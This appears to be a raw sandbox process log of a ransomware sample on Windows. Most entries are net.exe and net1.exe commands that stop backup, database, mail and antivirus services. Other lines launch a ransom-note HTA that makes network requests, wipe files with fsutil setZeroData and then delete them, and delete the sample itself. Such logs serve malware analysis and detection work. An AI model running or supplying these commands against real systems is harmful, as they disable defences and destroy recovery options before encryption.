C:\Windows\SysWOW64\net.exe
"net.exe" stop OracleClientCache80 /y
2⤵
PID:5556

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamTransportSvc /y
2⤵
PID:5548

C:\Windows\SysWOW64\net.exe
"net.exe" stop McTaskManager /y
2⤵
PID:5536

C:\Windows\SysWOW64\net.exe
"net.exe" stop MySQL80 /y
2⤵
PID:5528

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamRESTSvc /y
2⤵
PID:5520

C:\Windows\SysWOW64\net.exe
"net.exe" stop McShield /y
2⤵
PID:5508

C:\Windows\SysWOW64\net.exe
"net.exe" stop MySQL57 /y
2⤵
PID:5500

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamNFSSvc /y
2⤵
PID:5492

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeFrameworkMcAfeeFramework /y
2⤵
PID:5484

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerOLAPService /y
2⤵
PID:5476

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamMountSvc /y
2⤵
PID:5468

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeFramework /y
2⤵
PID:5456

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerADHelper100 /y
2⤵
PID:5448

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamHvIntegrationSvc /y
2⤵
PID:5440

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeEngineService /y
2⤵
PID:5432

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerADHelper /y
2⤵
PID:5424

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamEnterpriseManagerSvc /y
2⤵
PID:5416

C:\Windows\SysWOW64\net.exe
"net.exe" stop MBEndpointAgent /y
2⤵
PID:5408

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLSERVER /y
2⤵
PID:5392

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploySvc /y
2⤵
PID:5376

C:\Windows\SysWOW64\net.exe
"net.exe" stop MBAMService /y
2⤵
PID:5368

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$TPSAMA /y
2⤵
PID:5360

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploymentService /y
2⤵
PID:5352

C:\Windows\SysWOW64\net.exe
"net.exe" stop masvc /y
2⤵
PID:5344

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$TPS /y
2⤵
PID:5336

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamCloudSvc /y
2⤵
PID:5316

C:\Windows\SysWOW64\net.exe
"net.exe" stop macmnsvc /y
2⤵
PID:5308

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
2⤵
PID:5300

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamCatalogSvc /y
2⤵
PID:3796

C:\Windows\SysWOW64\net.exe
"net.exe" stop klnagent /y
2⤵
PID:2084

C:\Windows\SysWOW64\net.exe
"net.exe" stop FA_Scheduler /y
2⤵
PID:3568

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2012 /y
2⤵
PID:3940

C:\Windows\SysWOW64\net.exe
"net.exe" stop SDRSVC /y
2⤵
PID:5044

C:\Windows\SysWOW64\net.exe
"net.exe" stop ESHASRV /y
2⤵
PID:2080

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2008R2 /y
2⤵
PID:5004

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SYSTEM_BGC /y
2⤵
PID:4920

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploymentService /y
2⤵
PID:4844

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamTransportSvc /y
2⤵
PID:4884

C:\Windows\SysWOW64\net.exe
"net.exe" stop VSNAPVSS /y
2⤵
PID:4156

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2008R2 /y
2⤵
PID:5012

C:\Windows\SysWOW64\net.exe
"net.exe" stop ekrn /y
2⤵
PID:4836

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SQLEXPRESS /y
2⤵
PID:4748

C:\Windows\SysWOW64\net.exe
"net.exe" stop RTVscan /y
2⤵
PID:4592

C:\Windows\SysWOW64\net.exe
"net.exe" stop QBCFMonitorService /y
2⤵
PID:4532

C:\Windows\SysWOW64\net.exe
"net.exe" stop Intuit.QuickBooks.FCS /y
2⤵
PID:4464

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SQL_2008 /y
2⤵
PID:4160

C:\Windows\SysWOW64\net.exe
"net.exe" stop ccSetMgr /y
2⤵
PID:2556

C:\Windows\SysWOW64\net.exe
"net.exe" stop DefWatch /y
2⤵
PID:3860

C:\Windows\SysWOW64\net.exe
"net.exe" stop NetBackup BMR MTFTP Service /y
2⤵
PID:3868

C:\Windows\SysWOW64\net.exe
"net.exe" start FDResPub /y
2⤵
PID:3236

C:\Windows\SysWOW64\net.exe
"net.exe" stop bedbg /y
2⤵
PID:1184

C:\Windows\SysWOW64\net.exe
"net.exe" start upnphost /y
2⤵
PID:2220

C:\Windows\SysWOW64\net.exe
"net.exe" start Dnscache /y
2⤵
PID:3920

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
2⤵
- Blocklisted process makes network request
PID:11344

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
2⤵
PID:11268

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.7 -n 3
3⤵
- Runs ping.exe
PID:11336

C:\Windows\SysWOW64\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
3⤵
PID:13516

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe
2⤵
PID:11620

C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
3⤵
PID:11208

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start FDResPub /y
1⤵
PID:4268

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop bedbg /y
1⤵
PID:4224

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
1⤵
PID:4344

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer /y
2⤵
PID:14972

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
1⤵
PID:4488

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
1⤵
PID:4548

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
1⤵
PID:4396

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SntpService /y
1⤵
PID:7752

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROD /y
1⤵
PID:11420

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
1⤵
PID:11740

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
1⤵
PID:7980

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop audioendpointbuilder /y
1⤵
PID:7792

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EsgShKernel /y
1⤵
PID:12592

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
1⤵
PID:13244

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “aphidmonitorservice” /y
1⤵
PID:15132

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
1⤵
PID:14956

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
1⤵
PID:14988

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EPUpdateService /y
1⤵
PID:14964

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ntrtscan /y
1⤵
PID:14932

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPS /y
1⤵
PID:14940

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sophos /y
1⤵
PID:14948

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
1⤵
PID:14980

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVService /y
1⤵
PID:14924

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
1⤵
PID:14916

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
1⤵
PID:14892

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Symantec System Recovery” /y
1⤵
PID:14908

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CXDB /y
1⤵
PID:14900

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
1⤵
PID:14876

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SMTPSvc /y
1⤵
PID:14852

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
1⤵
PID:14884

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
1⤵
PID:14860

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ShMonitor /y
1⤵
PID:14868

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
1⤵
PID:14836

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
1⤵
PID:14828

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS /y
1⤵
PID:14840

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
1⤵
PID:14820

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
1⤵
PID:14812

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
1⤵
PID:14804

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
1⤵
PID:14796

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
1⤵
PID:14788

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msftesql$PROD /y
1⤵
PID:14780

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
1⤵
PID:14772

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPS /y
1⤵
PID:14764

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY /y
1⤵
PID:14628

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop tmlisten /y
1⤵
PID:14620

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
1⤵
PID:14612

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop IISAdmin /y
1⤵
PID:14604

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQL Backups /y
1⤵
PID:14596

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
1⤵
PID:14588

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Health Service” /y
1⤵
PID:14580

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
1⤵
PID:14572

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeES /y
1⤵
PID:14564

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
1⤵
PID:14556

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
1⤵
PID:14548

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SepMasterService /y
1⤵
PID:14540

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
1⤵
PID:14532

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
1⤵
PID:14524

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamMountSvc /y
1⤵
PID:14516

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
1⤵
PID:14508

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AVP /y
1⤵
PID:14500

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
1⤵
PID:14492

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer110 /y
1⤵
PID:14484

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
1⤵
PID:14476

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL57 /y
1⤵
PID:14468

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
1⤵
PID:14460

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop YooIT /y
1⤵
PID:14452

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Clean Service” /y
1⤵
PID:14444

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
1⤵
PID:14436

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
1⤵
PID:14428

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
1⤵
PID:14420

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
1⤵
PID:14412

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
1⤵
PID:14404

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Agent” /y
1⤵
PID:14396

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SstpSvc /y
1⤵
PID:14388

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
1⤵
PID:14380

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msexchangeadtopology /y
1⤵
PID:14372

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
1⤵
PID:14364

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
1⤵
PID:14356

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSRS /y
1⤵
PID:14348

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop veeam /y
1⤵
PID:14340

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
1⤵
PID:4392

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EraserSvc11710 /y
1⤵
PID:4932

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMTA /y
1⤵
PID:4624

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMGMT /y
1⤵
PID:4228

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DCAgent /y
1⤵
PID:4248

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
PID:4820

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msexchangeimap4 /y
1⤵
PID:4872

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
1⤵
PID:4488

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop POP3Svc /y
1⤵
PID:4560

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop UI0Detect /y
1⤵
PID:2600

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop W3Svc /y
1⤵
PID:2220

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start upnphost /y
2⤵
PID:4124

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSA /y
1⤵
PID:4520

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
1⤵
PID:4716

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
1⤵
PID:4628

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROD /y
1⤵
PID:5048

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Client” /y
1⤵
PID:5104

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
1⤵
PID:4868

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
1⤵
PID:4808

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
1⤵
PID:4892

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop WRSVC /y
1⤵
PID:4036

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
1⤵
PID:14328

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MBEndpointAgent /y
1⤵
PID:14320

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL80 /y
1⤵
PID:14312

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop unistoresvc_1af40a /y
1⤵
PID:14288

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetMsmqActivator /y
1⤵
PID:14276

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
1⤵
PID:14268

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ARSM /y
1⤵
PID:14260

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Smcinst /y
1⤵
PID:14252

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKeyScheduler /y
1⤵
PID:14244

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sophossps /y
1⤵
PID:14236

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
1⤵
PID:14228

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
1⤵
PID:14220

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SmcService /y
1⤵
PID:14212

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
1⤵
PID:14204

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
1⤵
PID:14188

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop svcGenericHost /y
1⤵
PID:14180

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_filter /y
1⤵
PID:14172

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPS /y
1⤵
PID:14164

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_update_64 /y
1⤵
PID:14156

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_service /y
1⤵
PID:14148

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_update /y
1⤵
PID:14140

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
1⤵
PID:14132

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
1⤵
PID:14124

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TmCCSF /y
1⤵
PID:14116

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLBrowser /y
1⤵
PID:14108

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamRESTSvc /y
1⤵
PID:14100

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSafeOLRService /y
1⤵
PID:14092

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKey /y
1⤵
PID:14084

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper /y
1⤵
PID:14076

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSERVERAGENT /y
1⤵
PID:14068

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
1⤵
PID:14060

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeEngineService /y
1⤵
PID:14052

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sms_site_sql_backup /y
1⤵
PID:14044

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
1⤵
PID:14036

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfevtp /y
1⤵
PID:14028

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfemms /y
1⤵
PID:14020

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RESvc /y
1⤵
PID:14012

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
1⤵
PID:14004

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
1⤵
PID:13996

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop OracleClientCache80 /y
1⤵
PID:13988

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
1⤵
PID:13980

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfefire /y
1⤵
PID:13972

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
1⤵
PID:13956

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McTaskManager /y
1⤵
PID:13964

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McShield /y
1⤵
PID:13660

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
1⤵
PID:13652

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
1⤵
PID:13644

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer /y
1⤵
PID:13636

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SamSs /y
1⤵
PID:13628

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeFramework /y
1⤵
PID:13620

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Antivirus /y
1⤵
PID:13612

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
1⤵
PID:13604

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
1⤵
PID:13596

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
1⤵
PID:13588

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
1⤵
PID:13580

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
1⤵
PID:13572

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
1⤵
PID:13564

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
1⤵
PID:13556

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
1⤵
PID:13548

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sacsvr /y
1⤵
PID:13540

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVAdminService /y
1⤵
PID:13532

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
1⤵
PID:13524

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Message Router” /y
1⤵
PID:13516

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer100 /y
1⤵
PID:13508

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
1⤵
PID:13500

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
1⤵
PID:13488

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
1⤵
PID:13480

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop vapiendpoint /y
1⤵
PID:13472

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPS /y
1⤵
PID:13464

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
1⤵
PID:13456

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
1⤵
PID:13448

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
1⤵
PID:13440

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
1⤵
PID:13432

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
1⤵
PID:13424

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Enterprise Client Service” /y
1⤵
PID:13416

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
1⤵
PID:13408

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
1⤵
PID:13400

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
PID:13392

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
1⤵
PID:12316

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop macmnsvc /y
1⤵
PID:12308

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
1⤵
PID:12300

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
1⤵
PID:12292

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
1⤵
PID:4124

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
1⤵
PID:4668

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
1⤵
PID:4380

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ESHASRV /y
1⤵
PID:11232

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop FA_Scheduler /y
1⤵
PID:11216

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
1⤵
PID:11112

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SDRSVC /y
1⤵
PID:11096

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLSERVER /y
1⤵
PID:11036

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
1⤵
PID:10012

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MBAMService /y
1⤵
PID:12280

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCloudSvc /y
1⤵
PID:12272

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
1⤵
PID:12256

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploySvc /y
1⤵
PID:12240

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop masvc /y
1⤵
PID:12232

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
1⤵
PID:9680

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s FDResPub
1⤵
PID:6528

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s upnphost
1⤵
PID:6496

C:\Windows\SysWOW64\net1.exe
